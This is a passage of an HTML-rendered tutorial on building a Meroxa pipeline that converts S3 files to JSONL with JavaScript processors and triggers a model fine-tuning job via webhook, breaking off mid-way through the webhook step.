        src=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/5a190/mermaid-diagram-2025-04-01-172345.png&quot;
        srcset=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/772e8/mermaid-diagram-2025-04-01-172345.png 200w,
/static/858e2bf2f8ee4c87e431d837717246d2/e17e5/mermaid-diagram-2025-04-01-172345.png 400w,
/static/858e2bf2f8ee4c87e431d837717246d2/5a190/mermaid-diagram-2025-04-01-172345.png 800w,
/static/858e2bf2f8ee4c87e431d837717246d2/c1b63/mermaid-diagram-2025-04-01-172345.png 1200w,
/static/858e2bf2f8ee4c87e431d837717246d2/29007/mermaid-diagram-2025-04-01-172345.png 1600w,
/static/858e2bf2f8ee4c87e431d837717246d2/772aa/mermaid-diagram-2025-04-01-172345.png 2042w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This diagram shows how raw files are ingested from S3, converted to JSONL using a custom processor, then further transformed, stored back in S3, and used to trigger a remote training job. The resulting fine-tuned model is then served via a recommendations API.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Prerequisites &amp;#x26; Environment Setup&lt;/h2&gt;
&lt;p&gt;Before you begin, ensure you have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Python Environment:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Install &lt;a href=&quot;https://www.python.org/downloads/&quot;&gt;Python 3.8+&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Create and activate a virtual environment:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/c45c7/v-env.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQklEQVR42p3MzUoCURgG4LmOSp3//1FTsFXdiBVUJkGFQYVW5iKF0lpqiyyi0kTLQQsKf9pE6CXNbt5OMyLRqlo8vN/5OO9HPXY+0OwN0ewMYHb/qT+0zd4Ajdd3i7qomjg6PkMmX8B+9uTvcnmkcwW7fN9C/YUcTB5mMad5EJhlQItesOwUWN4DjveCF1xf80/8KAXBB5qesHczWfdgInmAsK4gEjQQ9muYCQUQmTYQNBRomgCV0HQRuiGO5+90Q4IoMfZWKo1qu29RG9spqLwPhizAT4SCKgK6RGYeisiQzzQUhYGispBkBjKhKKyTsrPnwHGT9ubOHirtnkXli5eIrSewEFtDdHkV0aWYm8T8Stw1eju7sbhjkfRI3z4tXaHS6lrUrdlBufaE85sHFK8bI/VfK5Feuda271pd1J7frE8AXzviQmNtUAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Python virtual environment&quot;
        title=&quot;&quot;
        src=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/5a190/v-env.png&quot;
        srcset=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/772e8/v-env.png 200w,
/static/862478d4df01d8160ba7c6d27d2e91d7/e17e5/v-env.png 400w,
/static/862478d4df01d8160ba7c6d27d2e91d7/5a190/v-env.png 800w,
/static/862478d4df01d8160ba7c6d27d2e91d7/c1b63/v-env.png 1200w,
/static/862478d4df01d8160ba7c6d27d2e91d7/c45c7/v-env.png 1346w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Install required packages:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/62da8/packages.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVR42p2MTUvCcBzH90KCgqbb1M0tNy1WOwQdOvcaNKG0SDsUHutUkYdmkj35EOimwcBmIBgpHeoVBQ6+/Z0rpVsdPv/f5//9PVCG3R+anQGhP2zY/4TsGs+DT6v3DqrefoFeMXFarCBPOL/6O/lSFZdl07F6H6CumzY21laxrvnAaQxYhgYX9IHl6DEBeuLTmZdzQT9o3yxUTXUa9iuoQrUFTZUhhWYgyAHwPIMQ74MQ5ggscb/rvMC4zgusN+P3KgOOm4cSk51yswNKL5tYXolBCMwhEglDWghBlIJQoqLL6K9EJciKSPJxb5yJiMjCz/ySuujcGU+gSnULueMzbGcPkdzJIpHKYjOdITWDeGoPCc9d0hPiXpbc3cdW5gC5oxPnweqCqpHnllwu1h5RuDdw4aF7TLv+q/9dR7s3Rttpdd/wBUlERWgo/YRPAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Python required packages&quot;
        title=&quot;&quot;
        src=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/5a190/packages.png&quot;
        srcset=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/772e8/packages.png 200w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/e17e5/packages.png 400w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/5a190/packages.png 800w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/c1b63/packages.png 1200w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/62da8/packages.png 1262w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Meroxa Account &amp;#x26; S3 Setup:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sign up and log in to &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Configure two AWS S3 buckets: one for raw data (e.g., &lt;code class=&quot;language-text&quot;&gt;raw-data-bucket&lt;/code&gt;) and one for processed data (e.g., &lt;code class=&quot;language-text&quot;&gt;processed-data-bucket&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Ensure your environment (or cloud server) has proper AWS credentials or IAM roles to access these buckets.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Docker &amp;#x26; Heroku CLI:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Install &lt;a href=&quot;https://www.docker.com/get-started&quot;&gt;Docker&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Install the &lt;a href=&quot;https://devcenter.heroku.com/articles/heroku-cli&quot;&gt;Heroku CLI&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Step 1. Setting Up a Single Meroxa Pipeline&lt;/h2&gt;
&lt;p&gt;Meroxa pipelines are defined via a YAML configuration file that specifies sources, processors, and destinations. In this pipeline, we:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Ingest Raw Files:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Pull raw files (e.g., CSV, text files) from an S3 bucket.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Convert to JSONL:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Use a custom processor (&lt;code class=&quot;language-text&quot;&gt;convert_to_jsonl.js&lt;/code&gt;) to convert these raw files into JSONL format.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom Transformation:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Apply a second custom processor (&lt;code class=&quot;language-text&quot;&gt;transform_data.js&lt;/code&gt;) to further standardize each record (e.g., converting all keys to lowercase).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Store &amp;#x26; Trigger:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Write the processed JSONL data back to an S3 bucket and trigger an HTTP endpoint (via a &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor) to start a remote fine-tuning job.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Meroxa Pipeline YAML&lt;/h3&gt;
&lt;p&gt;Create a file named &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; with the following content:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/0f586/starting-pipeline.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 154%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAfCAYAAADnTu3OAAAACXBIWXMAAAsTAAALEwEAmpwYAAADkUlEQVR42qWVS28TVxiG/QdYlEWInevM2HP13Gc8HtsJlsqOIBIHJU5LEkDcUnXVRRdsWMCCDeoiC3YFJaJBgShEkRIgXARI0Kq/w/0Vlt9+54ytNuAQYhavvuPFef1+53vOmdT6ztvmxt4HbOz9hc0XH7G514Ne/tnaevM31nffNlKPn71v3rrzG5Z+uoKLPy9h8co1XLh6/at18doSzl+63Lp9dxnrO+8aqTVKWK//ACt3HIIxiJGhNIaGT2C4raG2hke6a1RIo6/vWGv2/Dwebr9upFaevmjO/LgAxygi8iM4to68meMyTTmRJUM3ctD07GfSDRmiNNiqLyzi/uOdf7hhbWYWhmKgXIxRjCyEoc7lejJcV4EfKDDyEmRFhKLul6plKWWmNUMJE8NNMpydhSAMIHRjxMUI49UYlq0hJwvcJKcInxkdYljH6GgaBb+MUliF61hQVWpRk9qbxKMbjoz2w7J0BJ4H33MR+gGdn0pnlOUpu7V7qKFpaomh68BxZUSRjkJBo/MkY53OsBdD33O4HEejc1T4hE2a+EFtH96y78KjhKbFMBE5GrIi9NayZRmUzuMqBAUEbkA8ymQqtbn7r6qaxKuez0EUBznYnximqTUFNrVqEzJ5WhuGzIdi0CYmts6318yYVbYnmx3qZpgkjMICioUYYUBJA52fXdLyfrF2WWVJCbkuHAoZAruIsUoJ358aw8lqiSbs8A0HMXg42F4JcVClCVvQNQUKH4TQm2FnygzqgInAtiyNPwqd9nrExuPYeJ5CLettqRxuxuOn+BwJbAY1f8r4VKWucH/ZcB/YDBnpf2ALR796CdgOBzv0E7AZZ+zV0Wgjq2pbjMlk/cWEKpnZ1K5OcKt8IB2g2TqpJJ0BLvP0zFToZihnJc5h6EX8thh5md8WRZW6At1Zq/qBHPbDtmzE4Tg9Wy7i2ESl4vAnzLZzvYDdT3dXpQ9Vhc4v5K0mCb8FbNPiCYuRh3LZRrliw/eVXhOmKSF94Vx6HMJS8pJYCh/CkRNO1+cgiBlK4qBUqGJ8rEiPg4dqNYDnG3wwbGM3aZ3v8vxCYri69bI5ee4cMunvIOcE6KpKVeR/wCRKA2zDgcpmh5HJHG9Nz83hwZNnieEvN27izFQNE7UaTk+excTkFCbY76/Qmdo01anWrzdvY2XzeSP1x/br5oMnu7i3uoHl3x/1pHsrG63Vp3tY237V+BfgB1j3LNDOGAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa pipeline.yaml with placeholders&quot;
        title=&quot;&quot;
        src=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/5a190/starting-pipeline.png&quot;
        srcset=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/772e8/starting-pipeline.png 200w,
/static/f7d72a3fe956988b2a150fb6daf435cc/e17e5/starting-pipeline.png 400w,
/static/f7d72a3fe956988b2a150fb6daf435cc/5a190/starting-pipeline.png 800w,
/static/f7d72a3fe956988b2a150fb6daf435cc/c1b63/starting-pipeline.png 1200w,
/static/f7d72a3fe956988b2a150fb6daf435cc/0f586/starting-pipeline.png 1498w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
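&lt;p&gt;The screenshot above isn’t copy-pastable, so here is an illustrative sketch of the shape such a pipeline config can take. The keys below are assumptions modeled on Conduit-style pipeline configs, not a transcription of the screenshot — use the template in the Meroxa dashboard as the source of truth:&lt;/p&gt;

```yaml
# Illustrative sketch only: the keys below are assumptions, not a
# verbatim copy of the pipeline.yaml shown above.
version: "2.2"
pipelines:
  - id: s3-to-finetune
    status: running
    connectors:
      - id: raw-s3
        type: source
        plugin: s3
        settings:
          aws.bucket: raw-data-bucket        # your raw-data bucket
      - id: processed-s3
        type: destination
        plugin: s3
        settings:
          aws.bucket: processed-data-bucket  # your processed-data bucket
    processors:
      - id: to-jsonl
        plugin: custom.javascript            # runs convert_to_jsonl.js
      - id: transform
        plugin: custom.javascript            # runs transform_data.js
      - id: notify-trainer
        plugin: webhook.http                 # triggers the fine-tuning job
```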
&lt;p&gt;&lt;strong&gt;Instructions:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Replace &lt;code class=&quot;language-text&quot;&gt;raw-data-bucket&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;processed-data-bucket&lt;/code&gt; with your actual S3 bucket names.&lt;/li&gt;
&lt;li&gt;Upload this YAML via the Meroxa dashboard by navigating to &lt;strong&gt;Pipelines → Create Pipeline&lt;/strong&gt; and pasting or uploading the file. Your pipeline should look like this in the dashboard:&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/27f8b/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAABYlAAAWJQFJUiTwAAAB1klEQVR42qWUyXaiUBRF8wFJjCKgFvYBbJBONIiITVJqYVMmJsYkk3xA/f/01H0MkkFRK7IyOOvBW9zDPpf7OLvKqYhTvqRBurZRVBwIZT2SWNEhyV3Y3gJ8UUNKVP6pO4szS5EaTQfd4QK9IESt7aLSvKF1AJPMXt7/oFCzcCnIpxkyFYiE0RXaHkr2FEUmYwyJ9sSqAU5qn07IlCk0wf1oIUOFHMXLUuQ0u6f9LO2l843Yuv8afogo0tELGtH1V89/acj6lKsYqFP0uJ4lNmR9YtFFipz6NmH+MzKX/0bkNBkJZQN82YTQ6ENoDZCjyGLLhVgzkSNxUuu0r8xoLngVluthvd/CmT3CWx5gBVsYpN6Y1sES2SSDfSEo0ByfDF8wDd8w/XWkASfzYIPB7AHWcHW6ISM85xWYRLg7PMCfP5P2EZXtr9Cf/KbTwgjbCQl7Ppa7RwSLI0bzJ9ijNbqjDW6m90QYJjvLbN4Uc4z57h2361dMwmNkwgy9uz2RhskIU6IM2QwwWhzgzu6j3jFDJt1dQuv/BF/Skp3luupAtQIqvo3WemcIWfcx377CnWyQoWG/SvL7KlU7UPQh9XKG646HotpDleaxP16haU9o6ON/Dn8BuJ7d/xg2PiUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa pipeline dashboard visualization&quot;
        title=&quot;&quot;
        src=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/5a190/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png&quot;
        srcset=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/772e8/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 200w,
/static/a4aa613fd43fd55e735731a6961e66d7/e17e5/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 400w,
/static/a4aa613fd43fd55e735731a6961e66d7/5a190/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 800w,
/static/a4aa613fd43fd55e735731a6961e66d7/c1b63/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1200w,
/static/a4aa613fd43fd55e735731a6961e66d7/29007/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1600w,
/static/a4aa613fd43fd55e735731a6961e66d7/27f8b/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1730w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Step 2. Writing Custom Processors for Meroxa&lt;/h2&gt;
&lt;p&gt;Meroxa requires custom processors to be written in JavaScript. We need three processors for our workflow.&lt;/p&gt;
&lt;h3&gt;2.1. JSONL Conversion Processor (&lt;code class=&quot;language-text&quot;&gt;convert_to_jsonl.js&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;This processor converts a raw record into a JSONL-formatted string before it’s stored in S3.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/b1001/jsonl.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 91.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC5UlEQVR42pVUS08TYRTtTzAuDLbQxzw67/nmVSvU5wawrT/AoBFajZRWjO7culI3ohsjmmgCBQE1ArFKFBOQv0WO9/umRXmYyOLM/eZ27plz77nTxFJna3f56/buYufX7vKXbXE+Lj5s7IjIuRIrGzt4+vwVmo06bkzdwth4DWMT/4/rtTqu3RzHkxezWPm2g8RSZxuN1n0UzVPIOSmk031IZ2JkDiCdOfxbNptEX98JTE4/wPvOFhLt1R+oN6chqVl4rgnX1eEyHU43ctiuBtfT4fkGmGfEOUcj5GFYKiRlALdb9zC/+h0JfqlNNqHpGYQFWxT6vhkX2XkiiIn8wKS8IWDZKnRDIsgCOSmF+tRdzH0mQn6pTbbgKDmEpg5mywiYQmrVbqG8B03vRQl5LSdwJOEEEZpSBkO2jcDLw3dleI4iFMZkCgwzJjNMZe8FpqWI+/2EqzGhJPUjdEwMmtQaRTd0wajtKNJRKFhErsGy4pdwIg7ewWHCbss86VHLlwoRwtBG8WyIqGiCRSoYkf/dZgwJav4fLdcaLchKPyxyruQzlM54RMgQkDomDCGzXK5QFQq5u1xdb8ZHKtS0LDlrwCN1zLdhkTFOQLP0bFLsUouqUKaRu1wtR8/pI2bYJIUDVGySChq2kRN7xnfRJNdNWxHzjPeT52OVPYOOVKjrWVw0HJwjlYNDLqKCj0LRJXMkeAWV7hnCiAkyl8BXqKd0H+F8V2E+n8FlL8B5KhosmURg0YxkUqIQgSrOjquIDhhTRc6geTq+BVnuR71xwBROeCEMUIpCUkLKWF7A8zT6Ugh8P4O4XR55znJoDIEDRc2QwumYsL22iYk7U/SRn4ZMuyjlUmIncxQ5st24d5Z4THZzSXo2hWTypPh8+f+CIHz46DFGr1YxUq1guFLGcPkKoRyjUj58rvw5j1SrGCVwjvYaES6sb+LdSgcv5z5h5nUbz2bnj4WZNwtU+xFviWNx/Sd+AxAcq3wAq8g5AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa custom javascript JSONL conversion processor code&quot;
        title=&quot;&quot;
        src=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/5a190/jsonl.png&quot;
        srcset=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/772e8/jsonl.png 200w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/e17e5/jsonl.png 400w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/5a190/jsonl.png 800w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/c1b63/jsonl.png 1200w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/b1001/jsonl.png 1380w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
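&lt;p&gt;For reference, a text version of this processor might look like the sketch below. The record shape (a &lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt; field) and the exported &lt;code class=&quot;language-text&quot;&gt;process()&lt;/code&gt; entry point are assumptions here, not Meroxa&apos;s exact API; check the processor documentation for the precise signature.&lt;/p&gt;

```javascript
// convert_to_jsonl.js -- hypothetical sketch of the JSONL conversion
// processor. The record shape ({ payload: ... }) and the exported
// process() entry point are assumptions, not Meroxa's exact API.
function process(record) {
  // Serialize the payload as one JSON object per line (JSONL).
  const jsonLine = JSON.stringify(record.payload) + "\n";
  return { ...record, payload: jsonLine };
}

module.exports = { process };
```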
&lt;h3&gt;2.2. Data Transformation Processor (&lt;code class=&quot;language-text&quot;&gt;transform_data.js&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;This processor further cleans the data by converting all keys to lowercase.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/c45c7/transform.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACZElEQVR42p1TWU8TURjtD8Fqt7mz3Nk7nS6UCjz5I9QXo/LGAwkPisFIqZpSccHYuJGwGVAIRSVWaiKayAPwiyY5fnNLWaKi9eFk7tw753znfPPdyNtP3/FuawerzR9Y+0zY+g+0doKNr7tY2fy2G3m98gETd6sYq1QweruM0fHucaN8P1jcaGH54/ZepPKwjkGLwS2cRUyJIpE4g0TyXxFFPN6DFIsFtfpsW3D83jQ0nUFicShqArJyBEVNHlsTju2H76qWau+rqaAy/QwLjdZ+5OZkFZwE02kOl+A4KlxXg2XJBAW2rYq9zrlNa8NkQlQ3GDhPCcE7U08wt94kwXIVqi6BGxI03gY3WNsBkTQi8PBclw7XTE5Qohg940hJ50LXJwVNjSqxJHhYlceoaijERLyQdBpCYVlJnhS0NBl5pqBXV5EhQd/T4GcdmJZ62MfQSUgWzg7cdZyeEBwjQZlIjCKWchkUMx76B/sIRfSdz2NgoBdeIQM7bYqeiQL0Mzruf+uQmio+cHMWvJyDbNaGk3WhOzoKhTT8fBqeb8M0FbieCcOzRK//LEgVuSahpHB4OkUv+egt+kgTWUSVYm2wI/w1ctY1cSGbQ6mQR/9AEfm8QeMjkyhDJkPOXAbPC0dJguPqNEKGiP+r4OQUDGq+pTLYqgxd5zSwMpgSPxjgU0DJmCIGPJiozbQFb1VqYuLjiZ6D69TT3dUjXjIZDcoPnmK+sbUfefRyEdeHR3D56hAuXbmGi10i5A0NjwT1+VUsrLf2InNrTbxYamBmdhmPX73pGiHv+VIjWN7cxtL7L3s/AS+Xan5hct0+AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa custom javascript data transformation processor code&quot;
        title=&quot;&quot;
        src=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/5a190/transform.png&quot;
        srcset=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/772e8/transform.png 200w,
/static/5b9830dfc3064a8a60b15b46d79778ad/e17e5/transform.png 400w,
/static/5b9830dfc3064a8a60b15b46d79778ad/5a190/transform.png 800w,
/static/5b9830dfc3064a8a60b15b46d79778ad/c1b63/transform.png 1200w,
/static/5b9830dfc3064a8a60b15b46d79778ad/c45c7/transform.png 1346w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
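&lt;p&gt;In text form, the transformation amounts to walking the payload&apos;s keys and lowercasing each one. As with the previous processor, the record shape and entry point below are illustrative assumptions:&lt;/p&gt;

```javascript
// transform_data.js -- hypothetical sketch that lowercases every key in the
// record payload; the record shape and entry point are assumptions.
function process(record) {
  const lowered = {};
  for (const key of Object.keys(record.payload)) {
    lowered[key.toLowerCase()] = record.payload[key];
  }
  return { ...record, payload: lowered };
}

module.exports = { process };
```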
&lt;h3&gt;2.3. Training Trigger &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; Processor&lt;/h3&gt;
&lt;p&gt;This processor sends an HTTP POST request to your training server endpoint when new processed data is available.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/a2ef2/webhook.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
